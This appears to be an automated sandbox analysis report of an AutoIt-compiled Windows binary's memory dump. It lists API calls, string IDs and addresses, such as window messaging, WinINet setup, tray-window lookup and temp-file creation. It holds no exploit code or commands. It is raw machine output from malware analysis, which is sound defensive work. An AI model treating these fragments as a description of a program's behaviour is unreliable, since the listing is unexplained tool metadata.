                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                  • String ID: FILE
                                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • __getbuf.LIBCMT ref: 00EC9B8A
                                                                                                                                  • __lseeki64.LIBCMT ref: 00EC9BFA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                  • String ID: pM
                                                                                                                                  • API String ID: 3311320906-582843881
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F0A668
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F0A67D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: '
                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00F0961B
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F09657
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE5BE4
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EE5C1F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  APIs
                                                                                                                                  • __snwprintf.LIBCMT ref: 00EF6BDD
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __snwprintf_memmove
                                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                  • API String ID: 3506404897-2584243854
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F09269
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F09274
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: Combobox
                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EBC657
                                                                                                                                    • Part of subcall function 00EBC619: GetStockObject.GDI32(00000011), ref: 00EBC66B
                                                                                                                                    • Part of subcall function 00EBC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBC675
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00F09775
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00F0978F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                  APIs
                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00F094A6
                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F094B5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                  • String ID: edit
                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE5CF3
                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EE5D12
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EF544C
                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EF5475
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                  • String ID: <local>
                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htonsinet_addr
                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EDC5E5
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                                  • String ID: EA06
                                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00EDC4E1
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00EDC562
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                  • String ID: #32770
                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                  APIs
                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EDB36B
                                                                                                                                    • Part of subcall function 00EC2011: _doexit.LIBCMT ref: 00EC201B
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message_doexit
                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00F1BAB8
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F1BCAB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                                  • String ID: WIN_XPe
                                                                                                                                  • API String ID: 510247158-3257408948
                                                                                                                                  APIs
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F084DF
                                                                                                                                  • PostMessageW.USER32(00000000), ref: 00F084E6
                                                                                                                                    • Part of subcall function 00EE8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EE83CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                  APIs
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F0849F
                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F084B2
                                                                                                                                    • Part of subcall function 00EE8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EE83CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00EED01E
                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00EED035
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                  • String ID: aut
                                                                                                                                  • API String ID: 3285503233-3010740371